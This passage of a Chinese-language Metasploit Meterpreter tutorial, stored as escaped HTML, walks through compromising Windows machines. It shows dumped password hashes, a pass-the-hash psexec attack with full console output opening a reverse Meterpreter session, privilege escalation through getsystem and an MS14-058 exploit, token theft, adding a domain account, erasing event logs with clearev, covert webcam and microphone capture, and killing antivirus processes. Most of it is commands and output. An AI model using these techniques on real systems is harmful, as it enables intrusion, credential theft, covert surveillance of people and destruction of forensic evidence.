[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: <\/p>\n\n\n\n

[+]HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::<\/p>\n\n\n\n

[+]test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::<\/p>\n\n\n\n

\u811a\u672c\u548cpost\u6a21\u5757\u90fd\u9700\u8981\u901a\u8fc7\u201crun\u201d\u547d\u4ee4\u6267\u884c\uff0c\u6211\u5728\u6d4b\u8bd5\u73af\u5883\u4e2d\u8fd0\u884chashdump\u6a21\u5757\u540e\u7684\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n\n

\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

\u6570\u636e\u7684\u8f93\u51fa\u683c\u5f0f\u4e3a\uff1a\u7528\u6237\u540d\uff1aSID\uff1aLM\u54c8\u5e0c\uff1aNTLM\u54c8\u5e0c:::\uff0c\u6240\u4ee5\u6211\u4eec\u5f97\u5230\u4e86\u4e09\u4e2a\u7528\u6237\u8d26\u53f7\uff0c\u5206\u522b\u4e3aAdministrator, Guest\u548cCoen\u3002<\/p>\n\n\n\n

\u5176\u4e2d\u7684LM<\/a>\u54c8\u5e0c\uff08aad3b435b51404eeaad3b435b51404ee\uff09\u8ddfNTLM<\/a>\u54c8\u5e0c\uff0831d6cfe0d16ae931b73c59d7e0c089c0\uff09\u5bf9\u5e94\u7684\u662f\u4e00\u4e2a\u7a7a\u5bc6\u7801\u3002<\/p>\n\n\n\n

\u63a5\u4e0b\u6765\u8981\u5904\u7406\u7684\u5c31\u662f\u7528\u6237Coen\u7684\u5bc6\u7801\uff08f773c5db7ddebefa4b0dae7ee8c50aea\uff09\u4e86\u3002\u867d\u7136\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u7c7b\u4f3cJohn the Ripper<\/a>\u8fd9\u6837\u7684\u5de5\u5177\u6765\u7834\u89e3\u5bc6\u7801\uff0c\u4f46\u662f\u6211\u4eec\u76f4\u63a5Google<\/a>\u8fd9\u4e2a\u54c8\u5e0c\u4e4b\u540e\uff0c\u5c31\u76f4\u63a5\u5f97\u5230\u4e86\u5bc6\u7801\u660e\u6587<\/a>\uff1atrustno1<\/a>\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

use post\/windows\/gather\/hashdump<\/p>\n\n\n\n

set session 4<\/p>\n\n\n\n

run<\/p>\n\n\n\n

\"20161006155822\"\/<\/figure>\n\n\n\n
  1. \u68c0\u67e5\u5df2\u6709\u6743\u9650+\u7cfb\u7edf\u7c7b\u578b  <\/li>
  2. \u68c0\u67e5\u662f\u5426\u4e3a\u57df\u63a7\u5236\u5668  <\/li>
  3. \u4ece\u6ce8\u518c\u8868\u8bfbhash\uff0c\u82e5\u5931\u8d25\uff0c\u6ce8\u5165LSASS\u8fdb\u7a0b\uff1b\u82e5\u57df\u63a7\u5236\u5668\uff0c\u76f4\u63a5\u6ce8\u5165LSASS\u8fdb\u7a0b  <\/li>
  4. \u82e5win2008+\u4f1a\u8bdd\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5c1d\u8bd5\u4f7f\u7528getsystem\uff0c\u82e5\u5728system\u4e0d\u80fd\u6ce8\u5165LSASS\uff0c\u5148migrate\u5230system\u6743\u9650\u4e0b\u7684\u8fdb\u7a0b\uff0c\u7ee7\u7eed\u6ce8\u5165LSASS  <\/li>
  5. \u82e5win7\/Vista+UAC\u5173\u95ed+\u4f1a\u8bdd\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5c1d\u8bd5getsystem\uff0c\u8bfb\u53d6hash  <\/li>
  6. \u82e5win2003\/xp\/2000\uff0c\u76f4\u63a5getsystem\uff0c\u8bfb\u53d6hash  <\/li><\/ol>\n\n\n\n

    10.\u901a\u8fc7Hash\u83b7\u53d6\u6743\u9650<\/p>\n\n\n\n

    msf > use exploit\/windows\/smb\/psexec<\/p>\n\n\n\n

    msf exploit(psexec) > show options   <\/p>\n\n\n\n

    Module options (exploit\/windows\/smb\/psexec):   <\/p>\n\n\n\n

    Name       Current Setting  Required  Description<\/p>\n\n\n\n

    ——————-  ——–  ———–<\/p>\n\n\n\n

    RHOST                       yes       The target address<\/p>\n\n\n\n

    RPORT      445              yes       Set the SMB service port<\/p>\n\n\n\n

    SHAREADMIN$           yes       The share to connect to, can be an admi                                              n share<\/p>\n\n\n\n

    (ADMIN$,C$,…) or a normal read\/write folder share<\/p>\n\n\n\n

    SMBDomainWORKGROUP        no        The Windows domain to use for authentication<\/p>\n\n\n\n

    SMBPass                     no        The password for the specified username<\/p>\n\n\n\n

    SMBUser                     no        The username to authenticate as   <\/p>\n\n\n\n

    Exploit target:   <\/p>\n\n\n\n

    Id  Name<\/p>\n\n\n\n

    —  —-<\/p>\n\n\n\n

    0   Automatic   <\/p>\n\n\n\n

    msf exploit(psexec) > set RHOST 192.168.0.254<\/p>\n\n\n\n

    RHOST => 192.168.0.254<\/p>\n\n\n\n

    msf exploit(psexec) > set SMBUser isosky<\/p>\n\n\n\n

    SMBUser => isosky<\/p>\n\n\n\n

    msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537   <\/p>\n\n\n\n

    SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537<\/p>\n\n\n\n

    msf exploit(psexec) > exploit<\/p>\n\n\n\n

    [*] Started reverse handler on 192.168.0.3:4444<\/p>\n\n\n\n

    [*] Connecting to the server…<\/p>\n\n\n\n

    [*] Authenticating to 192.168.0.254:445|WORKGROUP as user ‘isosky’…<\/p>\n\n\n\n

    [*] Uploading payload…<\/p>\n\n\n\n

    [*] Created \\UGdecsam.exe…<\/p>\n\n\n\n

    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\\svcctl] …<\/p>\n\n\n\n

    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\\svcctl] …<\/p>\n\n\n\n

    [*] Obtaining a service manager handle…<\/p>\n\n\n\n

    [*] Creating a new service (MZsCnzjn – “MrZdoQwIlbBIYZQJyumxYX”)…<\/p>\n\n\n\n

    [*] Closing service handle…<\/p>\n\n\n\n

    [*] Opening service…<\/p>\n\n\n\n

    [*] Starting the service…<\/p>\n\n\n\n

    [*] Removing the service…<\/p>\n\n\n\n

    [*] Closing service handle…<\/p>\n\n\n\n

    [*] Deleting \\UGdecsam.exe…<\/p>\n\n\n\n

    [*] Sending stage (749056 bytes) to 192.168.0.254<\/p>\n\n\n\n

    [*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800<\/p>\n\n\n\n

    11.\u6355\u6349\u5c4f\u5e55<\/p>\n\n\n\n

    \u8981\u60f3\u67e5\u770b\u5230\u8fdc\u7a0b\u673a\u5668\u5f53\u524d\u7684\u684c\u9762\u4fe1\u606f\uff0c\u53ef\u4ee5\u4f7f\u7528\u201cscreenshot\u201d\u547d\u4ee4\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u547d\u4ee4\u4e0d\u4ec5\u628a\u5bf9\u65b9\u7684\u684c\u9762\u7ed9\u663e\u793a\u4e86\u51fa\u6765\u800c\u4e14\u628a\u684c\u9762\u4f5c\u4e3a\u56fe\u7247\u5f62\u5f0f\u4fdd\u5b58\u5728\u4e86\u672c\u5730\u3002\u6211\u4eec\u901a\u8fc7\u684c\u9762\u7684\u4fe1\u606f\u53ef\u4ee5\u77e5\u9053\u4e00\u4e9b\u5bf9\u6211\u4eec\u5165\u4fb5\u6709\u5e2e\u52a9\u7684\u4fe1\u606f\uff0c\u6bd4\u5982\u5bf9\u65b9\u7684\u6740\u6bd2\u8f6f\u4ef6\u7684\u7c7b\u578b\u7b49\u7b49\u3002<\/p>\n\n\n\n

    \u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u201cscreenshot\u201d\u547d\u4ee4\u6765\u8fdb\u884c\u5c4f\u5e55\u622a\u56fe\u5e76\u5b58\u50a8\u5728\u6211\u4eec\u7684\u7cfb\u7edf\u4e4b\u4e2d\u3002<\/a><\/p>\n\n\n\n

    \u622a\u53d6\u7684\u6548\u679c\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    12.\u5f97\u5230\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n

    \u4f7f\u7528\u547d\u4ee4\u201crun vnc\u201d\u5c06\u4f1a\u5f39\u51fa\u7a97\u53e3\uff0c\u5728\u6b64\u7a97\u53e3\u4e2d\u5c31\u662f\u5bf9\u65b9\u73b0\u5728\u6253\u5f00\u7684\u684c\u9762\u60c5\u51b5\uff0c\u5728\u8fd9\u91cc\uff0c\u53ef\u4ee5\u5bf9\u8fdc\u7a0b\u673a\u5668\u8fdb\u884c\u64cd\u63a7\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n
    \"\"\/<\/a><\/figure>\n\n\n\n

    13.\u6743\u9650\u63d0\u5347<\/p>\n\n\n\n

    \u8fd9\u662fmeterpreter\u4e2d\u5b9e\u65bd\u6f0f\u6d1e\u5229\u7528\u7cfb\u7edf\u7279\u6743\u8981\u6c42\u7684\u4e00\u4e2a\u91cd\u8981\u7684\u6a21\u5757\u3002\u4e3a\u4e86\u8fd9\u4e2a\u76ee\u7684,\u6211\u4eec\u5fc5\u987b\u7528PRIV extention.\uff0c\u5728\u65e7\u7248\u672c\u7684Metasploit\u4e2dPriv extension\u5e76\u4e0d\u81ea\u52a8\u88c5\u8f7d\uff0c\u4f7f\u7528\u201cuse priv\u201d\u624b\u52a8\u52a0\u8f7d\u7684\u3002\u7136\u800c\u5728\u540e\u6765\u7684msf\u7248\u672c\u4e2d\u5e76\u4e0d\u9700\u8981\u62c5\u5fc3\u8fd9\u4e00\u70b9\u3002<\/p>\n\n\n\n

    \u4f7f\u7528\u201cgetuid\u201d\u83b7\u5f97\u5f53\u524d\u7684\u6743\u9650\uff0cmigrate+PID\u8fc1\u79fb\u8fdb\u7a0b\uff08\u5f53\u6211\u4eec\u653b\u51fb\u4e00\u4e2a\u7cfb\u7edf\u662f\uff0c\u5e38\u5e38\u662f\u5bf9\u50cf\u662fIE\u4e4b\u7c7b\u7684\u670d\u52a1\u6f0f\u6d1e\u8fdb\u884c\u5229\u7528\u7684\uff0c\u53ef\u662f\u4e0d\u514d\u6709\u5bf9\u65b9\u5173\u95edIE\u7684\u60c5\u51b5\uff0c\u90a3\u4e48\u6211\u4eec\u7684meterpreter\u4f1a\u8bdd\u5c06\u4f1a\u5173\u95ed\uff0c\u4ece\u800c\u5bfc\u81f4\u4e0e\u76ee\u6807\u7cfb\u7edf\u5931\u53bb\u8fde\u63a5\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u8fc1\u79fb\u8fdb\u7a0b\u540e\u7684\u653b\u51fb\u6a21\u5757\uff0c\u5c06sessions\u8fc1\u79fb\u5230\u5185\u5b58\u7a7a\u95f4\u4e2d\u7684\u5176\u4ed6\u7a33\u5b9a\u7684\u3001\u4e0d\u4f1a\u88ab\u5173\u95ed\u7684\u670d\u52a1\u8fdb\u7a0b\u4e2d\uff0c\u4ee5\u7ef4\u6301\u7a33\u5b9a\u7684\u7cfb\u7edf\u63a7\u5236\uff09\uff0c\u4ece\u5217\u8868\u4e2d\u770b\u5230PID\u4e3a500\u7684\u662fadministrator\u6743\u9650\uff0c\u6240\u4ee5\u662f\u8fc1\u79fb\u5230administrator\u7684\u6743\u9650\uff0c\u201cgetsystem \u2013h\u201d\u5347\u7ea7\u4e3a\u6743\u9650SYSTEM\u8d26\u6237\u3002\u8fd9\u4e2a\u6a21\u5757\u53ef\u4ee5\u7528\u6765\u63d0\u5347\u6211\u4eec\u7684\u7279\u6743\uff0c\u6709\u56db\u4e2a\u6280\u5de7\u3002Meterpreter\u81ea\u52a8\u68c0\u67e5\u56db\u4e2a\u65b9\u6cd5\u5e76\u4e14\u5c1d\u8bd5\u5176\u6700\u597d\u65b9\u6cd5\u3002\u7136\u540e\u770b\u5230\u6211\u4eec\u6743\u9650\u53c8\u53d8\u4e3a\u4e86system\u6743\u9650\u4e86\u3002<\/p>\n\n\n\n

    ps#\u5217\u51fa\u6b63\u5728\u8fd0\u884c\u7684\u8fdb\u7a0b<\/p>\n\n\n\n

    kill pid # \u6740\u6b7b\u8fdb\u7a0b<\/p>\n\n\n\n

    migrate pid # \u5c06Meterpreter\u4f1a\u8bdd\u79fb\u690d\u5230\u8fdb\u7a0b\u6570\u4e3apid\u7684\u8fdb\u7a0b\u4e2d,\u9700\u8981\u6ce8\u610f\u7684\u662f\u5982\u679c\u5b58\u5728\u6740\u8f6f\u7684\u8bdd\u53ef\u80fd\u4f1a\u963b\u6b62\u8fdb\u7a0b\u6ce8\u5165\uff0c\u6240\u4ee5\u628a\u4f1a\u8bdd\u8fdb\u7a0b\u6ce8\u5165\u5230svchost.exe\u662f\u4e00\u4e2a\u597d\u65b9\u6cd5<\/p>\n\n\n\n

    getprivs#\u5c3d\u53ef\u80fd\u83b7\u53d6\u5c3d\u53ef\u80fd\u591a\u7684\u7279\u6743<\/p>\n\n\n\n

    getuid #\u83b7\u5f97\u5f53\u524d\u7684\u6743\u9650<\/p>\n\n\n\n

    getsystem #\u901a\u8fc7\u5404\u79cd\u653b\u51fb\u5411\u91cf\u5c06\u4e00\u4e2a\u7ba1\u7406\u5e10\u6237\uff08\u901a\u5e38\u4e3a\u672c\u5730Administrator\u8d26\u6237\uff09\u63d0\u5347\u4e3a\u672c\u5730SYSTEM\u5e10\u6237<\/p>\n\n\n\n

    getsystem \u2013h #\u5347\u7ea7\u6743\u9650SYSTEM\u8d26\u6237<\/p>\n\n\n\n

    \u4f7f\u7528MS14-058\u4e4b\u7c7b\u7684Exp\u8fdb\u884c\u63d0\u6743:<\/p>\n\n\n\n

    meterpreter > background<\/p>\n\n\n\n

    [*] Backgrounding session 3..<\/p>\n\n\n\n

    msf exploit(handler) > use exploit\/windows\/local\/ms14_058_track_popup_menu<\/p>\n\n\n\n

    msf exploit(ms14_058_track_popup_menu) > set SESSION 3<\/p>\n\n\n\n

    use priv#\u52a0\u8f7d\u7279\u6743\u63d0\u5347\u6269\u5c55\u6a21\u5757\uff0c\u6765\u6269\u5c55Meterpreter\u5e93<\/p>\n\n\n\n

    \u5217\u51fa\u8fdc\u7a0b\u673a\u5668\u7684\u8fdb\u7a0b\u548c\u8fdb\u7a0bID\u65b9\u4fbf\u8fc1\u79fb\u6211\u4eec\u7684\u8fdb\u7a0b\uff0c\u8fdb\u800c\u6539\u53d8\u6211\u4eec\u7684\u6743\u9650\u3002\u4f7f\u7528\u201cps\u201d\u547d\u4ee4\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    \u5728\u5f97\u5230\u7684\u8fdb\u7a0b\u5217\u8868\u540e\uff0c\u53ef\u4ee5\u5b9e\u73b0\u8fc1\u79fb\u8fdb\u7a0b\uff0c\u7528getpid\u67e5\u770b\u5f53\u524d\u8fdb\u7a0b\u53f7\uff0c\u7136\u540e\u6839\u636e\u4e0a\u56fe\u65e2\u53ef\u4ee5\u77e5\u9053\u5f53\u524d\u7684\u6743\u9650\uff0c\u82e5\u518d\u7528migrate+pid\uff0c\u5c31\u4f1a\u8fc1\u79fb\u5230\u53e6\u4e00\u4e2a\u8fdb\u7a0b\u4e2d\uff0c\u7136\u540e\u6211\u4eec\u7684\u6743\u9650\u5c31\u6539\u53d8\u4e86\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n
    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    14.\u76d7\u53d6\u4ee4\u724c<\/p>\n\n\n\n

    meterpreter >use incognito    \u52a0\u8f7dincoginto\u529f\u80fd\uff08\u7528\u6765\u76d7\u7a83\u76ee\u6807\u4e3b\u673a\u7684\u4ee4\u724c\u6216\u662f\u5047\u5192\u7528\u6237)<\/p>\n\n\n\n

    meterpreter >list_tokens -u    \u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7528\u6237\u7684\u53ef\u7528\u4ee4\u724c<\/p>\n\n\n\n

    meterpreter >list_tokens -g    \u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7528\u6237\u7ec4\u7684\u53ef\u7528\u4ee4\u724c<\/p>\n\n\n\n

    meterpreter >impersonate_token DOMAIN_NAME\\\\USERNAME    \u5047\u5192\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u53ef\u7528\u4ee4\u724c,\u5982meterpreter > impersonate_token QLWEB\\\\Administrato<\/p>\n\n\n\n

    meterpreter >execute -f cmd.exe -i -t #\u8c03\u7528\u57df\u6743\u9650shell<\/p>\n\n\n\n

    meterpreter > getuid<\/p>\n\n\n\n

    meterpreter>add_user 0xfa funny \u2013h192.168.3.98  #\u5728\u57df\u63a7\u4e3b\u673a\u4e0a\u6dfb\u52a0\u8d26\u6237<\/p>\n\n\n\n

    meterpreter>reg command   # \u5728\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868\u4e2d\u8fdb\u884c\u4ea4\u4e92\uff0c\u521b\u5efa\uff0c\u5220\u9664\uff0c\u67e5\u8be2\u7b49\u64cd\u4f5c<\/p>\n\n\n\n

    meterpreter>setdesktop number   #\u5207\u6362\u5230\u53e6\u4e00\u4e2a\u7528\u6237\u754c\u9762\uff08\u8be5\u529f\u80fd\u57fa\u4e8e\u54ea\u4e9b\u7528\u6237\u5df2\u767b\u5f55\uff09<\/p>\n\n\n\n

    meterpreter>ps #\u67e5\u770b\u76ee\u6807\u673a\u5668\u8fdb\u7a0b\uff0c\u627e\u51fa\u57df\u63a7\u8d26\u6237\u8fd0\u884c\u7684\u8fdb\u7a0bID<\/p>\n\n\n\n

    meterpreter>steal_token pid #\u76d7\u7a83\u7ed9\u5b9a\u8fdb\u884c\u7684\u53ef\u7528\u4ee4\u724c\u5e76\u8fdb\u884c\u4ee4\u724c\u5047\u5192<\/p>\n\n\n\n

    meterpreter>drop_token pid #\u505c\u6b62\u5047\u5192\u5f53\u524d\u4ee4\u724c<\/p>\n\n\n\n

    \u53e6\u4e00\u4e2a\u63d0\u6743\u7684\u65b9\u6cd5\u662f\u626e\u6f14\u4e00\u4e2a\u5e10\u6237\u4ece\u4e00\u4e2a\u7279\u5b9a\u8fdb\u7a0b\u5077\u53d6\u4ee4\u724c\u3002\u4e3a\u6b64\uff0c\u6211\u4eec\u9700\u8981\u201cincognito\u201d\u6269\u5c55\uff0c\u4f7f\u7528\u201csteal_token+PID\u201d\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\u6211\u4eec\u4f7f\u7528\u7684\u662fsteal_token 640\uff0c\u5176\u4e2d\u7531\u524d\u9762\u6267\u884cps\u540e\u5f97\u5230\u7684\u4fe1\u606f\u53ef\u77e5\uff0cPID\u4e3a640\u7684\u6743\u9650\u4e3aadministrator\uff0c\u6240\u4ee5\u6211\u4eec\u5728\u6267\u884c\u547d\u4ee4\u540e\u867d\u7136\u63d0\u793a\u9519\u8bef\u4fe1\u606f\uff0c\u4f46\u662f\u5b83\u4ecd\u4f1a\u88ab\u6210\u529f\u5728\u540e\u53f0\u6267\u884c\uff0c\u6240\u4ee5\u5728\u8fd0\u884csteal_token\u540e\u6838\u5b9eUID\uff0c\u6211\u4eec\u7684\u6743\u9650\u5c31\u53d8\u4e3a\u4e86administrator\u4e86\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    load incognito<\/p>\n\n\n\n

    list_tokens -u<\/p>\n\n\n\n

    impersonate_token xxxxx\\\\xxxxxxx<\/p>\n\n\n\n

    execute -f cmd.exe -i -t<\/p>\n\n\n\n

    \"20161006131139\"\/<\/figure>\n\n\n\n

    15.\u6e05\u9664\u4e8b\u4ef6\u65e5\u5fd7<\/p>\n\n\n\n

    \u5b8c\u6210\u653b\u51fb\u64cd\u4f5c\u4e4b\u540e\uff0c\u5343\u4e07\u522b\u5fd8\u4e86\u201c\u6253\u626b\u6218\u573a\u201d\u3002\u6211\u4eec\u7684\u6240\u6709\u64cd\u4f5c\u90fd\u4f1a\u88ab\u8bb0\u5f55\u5728\u76ee\u6807\u7cfb\u7edf\u7684\u65e5\u5fd7\u6587\u4ef6\u4e4b\u4e2d\uff0c\u56e0\u6b64\u6211\u4eec\u9700\u8981\u5728\u5b8c\u6210\u653b\u51fb\u4e4b\u540e\u4f7f\u7528\u547d\u4ee4\u201cclearev\u201d\u547d\u4ee4\u6765\u6e05\u9664\u4e8b\u4ef6\u65e5\u5fd7<\/p>\n\n\n\n

    \u6267\u884c\u201cclearev\u201d\u547d\u4ee4\uff0c\u5c06\u6e05\u9664\u4e8b\u4ef6\u65e5\u5fd7\u3002\u8fd9\u4e2a\u547d\u4ee4\u6ca1\u6709\u4efb\u4f55\u9009\u9879\u6216\u53c2\u6570\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    \u6267\u884c\u201cclearev\u201d\u547d\u4ee4\u540e\u6253\u5f00\u76ee\u6807\u673a\u5668\u7684\u4e8b\u4ef6\u67e5\u770b\u5668\u91cc\u9762\u7684\u5e94\u7528\u7a0b\u5e8f\u3001\u5b89\u5168\u6027\u3001\u7cfb\u7edf\u90fd\u662f\u662f\u7a7a\u7684\uff1a<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    16.\u7f51\u7edc\u6444\u50cf\u5934<\/p>\n\n\n\n

    record_mic\u3000\u3000\u3000 #\u97f3\u9891\u5f55\u5236<\/p>\n\n\n\n

    webcam_chat\u3000\u3000\u3000#\u67e5\u770b\u6444\u50cf\u5934\u63a5\u53e3<\/p>\n\n\n\n

    webcam_list\u3000\u3000\u3000#\u67e5\u770b\u6444\u50cf\u5934\u5217\u8868<\/p>\n\n\n\n

    webcam_stream\u3000\u3000#\u6444\u50cf\u5934\u89c6\u9891\u83b7\u53d6<\/p>\n\n\n\n

    webcam_list<\/p>\n\n\n\n

    meterpreter > webcam_list<\/p>\n\n\n\n

    1: Creative WebCam NX Pro<\/p>\n\n\n\n

    2: Creative WebCam NX Pro (VFW)<\/p>\n\n\n\n

    meterpreter ><\/p>\n\n\n\n

    webcam_snap<\/p>\n\n\n\n

    meterpreter > webcam_snap -h<\/p>\n\n\n\n

    Usage: webcam_snap [options]<\/p>\n\n\n\n

    OPTIONS:<\/p>\n\n\n\n

        -h      Help Banner<\/p>\n\n\n\n

        -i >opt>  The index of the webcam to use (Default: 1)<\/p>\n\n\n\n

        -p >opt>  The JPEG image path (Default: ‘gnFjTnzi.jpeg’)<\/p>\n\n\n\n

        -q >opt>  The JPEG image quality (Default: ’50’)<\/p>\n\n\n\n

        -v >opt>  Automatically view the JPEG image (Default: ‘true’)<\/p>\n\n\n\n

    meterpreter ><\/p>\n\n\n\n

    OPTIONS:<\/p>\n\n\n\n

    -h:    Displays the help information for the command<\/p>\n\n\n\n

    -i opt:       If more then 1 web cam is connected, use this option to select the device to capture the<\/p>\n\n\n\n

            image from<\/p>\n\n\n\n

    -p opt:       Change path and filename of the image to be saved<\/p>\n\n\n\n

    -q opt:       The imagine quality, 50 being the default\/medium setting, 100 being best quality<\/p>\n\n\n\n

    -v opt:       By default the value is true, which opens the image after capture<\/p>\n\n\n\n

    Example usage:<\/p>\n\n\n\n

    meterpreter > webcam_snap -i 1 -v false<\/p>\n\n\n\n

    [*] Starting…<\/p>\n\n\n\n

    [+] Got frame<\/p>\n\n\n\n

    [*] Stopped<\/p>\n\n\n\n

    Webcam shot saved to: \/root\/Offsec\/YxdhwpeQ.jpeg<\/p>\n\n\n\n

    meterpreter ><\/p>\n\n\n\n

    \u201cwebcam_snap\u201d\u547d\u4ee4\u4e3a\u6293\u53d6\u76ee\u6807\u4e3b\u673a\u5f53\u524d\u7684\u6444\u50cf\u5934\u62cd\u6444\u5230\u7684\u753b\u9762\uff0c\u5e76\u5c06\u5b83\u4ee5\u56fe\u7247\u5f62\u5f0f\u4fdd\u5b58\u5230\u672c\u5730\uff0c\u201cwebcam_snap \u2013h\u201d\u547d\u4ee4\u4e3a\u67e5\u770b\u53c2\u6570\u7684\u4f7f\u7528\u65b9\u6cd5\u3002\u7531\u4e8e\u6211\u4eec\u7684\u5b9e\u9a8c\u4e2d\u76ee\u6807\u673a\u5668\u6ca1\u6709\u6444\u50cf\u5934\uff0c\u6240\u4ee5\u6211\u4eec\u8fd0\u884c\u201cwebcam_snap -i 1 -v false\u201d\u547d\u4ee4\u4e4b\u540e\u8fd4\u56de\u4ee5\u4e0b\u4fe1\u606f\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n
    \"Using<\/a><\/figure>\n\n\n\n

    17.\u4e00\u4e9b\u811a\u672c\u547d\u4ee4<\/p>\n\n\n\n

    \u4e3a\u83b7\u53d6\u8fdc\u7a0b\u673a\u5668\u4e0a\u7684\u4fe1\u606f\uff0c\u5728meterpreter\u4e2d\u8fd8\u6709\u5f88\u591a\u811a\u672c\u53ef\u7528\uff0c\u505a\u66f4\u5927\u7684\u6e17\u900f\u6d4b\u8bd5\u3002<\/p>\n\n\n\n

    \u4f7f\u7528\u201crun scriptname\u201d\u6765\u4f7f\u7528meterpreter\u6a21\u5757\u4e2d\u7684\u811a\u672c\u547d\u4ee4<\/p>\n\n\n\n

    (1)\u8c03\u7528post\/windows\/gather\/checkvm\u540e\u6e17\u900f\u6a21\u5757\uff0c\u786e\u5b9a\u76ee\u6807\u4e3b\u673a\u662f\u5426\u662f\u4e00\u53f0\u865a\u62df\u673a<\/p>\n\n\n\n

    \u547d\u4ee4\uff1a<\/p>\n\n\n\n

    run  post\/windows\/gather\/checkvm<\/p>\n\n\n\n

    \u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/a><\/figure>\n\n\n\n

    \u540c\u6837\u6709\u8bb8\u591a\u7c7b\u4f3c\u8fd9\u6837\u7684\u811a\u672c\uff0c\u4e0b\u9762\u6765\u4ecb\u7ecd\u51e0\u4e2a\u91cd\u8981\u7684\u811a\u672c\uff1a<\/p>\n\n\n\n

    (2) packetrecorder\u2014\u2014\u201crun packetrecorder\u201d\u67e5\u770b\u76ee\u6807\u7cfb\u7edf\u7684\u6240\u6709\u7f51\u7edc\u6d41\u91cf\uff0c\u5e76\u4e14\u8fdb\u884c\u6570\u636e\u5305\u8bb0\u5f55\uff0c-i 1\u6307\u5b9a\u8bb0\u5f55\u6570\u636e\u5305\u7684\u7f51\u5361\u3002<\/p>\n\n\n\n

    \u4ece\u4e0b\u56fe\u4e2d\u8fd0\u884c\u4e4b\u540e\u8fd4\u56de\u7684\u4fe1\u606f\u4e2d\u53ef\u4ee5\u5230\u6211\u4eec\u9700\u8981\u67e5\u770b\u7684\u76ee\u6807\u7cfb\u7edf\u7684\u7f51\u7edc\u6d41\u91cf\u4fe1\u606f\u5c06\u88ab\u5b58\u50a8\u7684\u8def\u5f84\uff0c\u53ef\u4ee5\u5230\u4e0b\u9762\u8def\u5f84\u4e2d\u76f4\u63a5\u67e5\u770b\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    (3)get_local_subnets\u2014\u2014\u201crun get_local_subnets\u201d\u5f97\u5230\u672c\u5730\u5b50\u7f51\u7f51\u6bb5<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    (4)getcountermeasure\u2014run getcountermeasure\u663e\u793aHIPS\u548cAV\u8fdb\u7a0b\u7684\u5217\u8868\uff0c\u663e\u793a\u8fdc\u7a0b\u673a\u5668\u7684\u9632\u706b\u5899\u89c4\u5219\uff0c\u5217\u51faDEP\u548cUAC\u7b56\u7565<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    (5) scraper\u2014\u2014\u201crun scraper\u201d\u4ece\u76ee\u6807\u4e3b\u673a\u83b7\u5f97\u6240\u6709\u7f51\u7edc\u5171\u4eab\u7b49\u4fe1\u606f<\/p>\n\n\n\n

    \u5e76\u4e14\u83b7\u5f97\u7684\u8fd9\u4e9b\u6240\u6709\u8fd9\u4e9b\u4fe1\u606f\u90fd\u5b58\u50a8\u5728\/root\/.msf4\/logs\/scripts\/scraper directory\u76ee\u5f55\u4e0b\u3002\u4f7f\u7528ls\u547d\u4ee4\u67e5\u770b\u5b58\u50a8\u7684\u8fd9\u4e9b\u6587\u4ef6\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n
    \"\"\/<\/a><\/figure>\n\n\n\n

    (6) killav\u2014\u2014\u201crun killav\u201d\u547d\u4ee4\u7ec8\u6b62Av\u8fdb\u7a0b\uff0c\u53ef\u4ee5\u5f88\u5feb\u7684\u6e05\u9664\u6211\u4eec\u7684\u8def\u5f84\u548c\u6709\u6548\u6e17\u900f\u6d4b\u8bd5\u7684\u8bb0\u5f55<\/p>\n\n\n\n

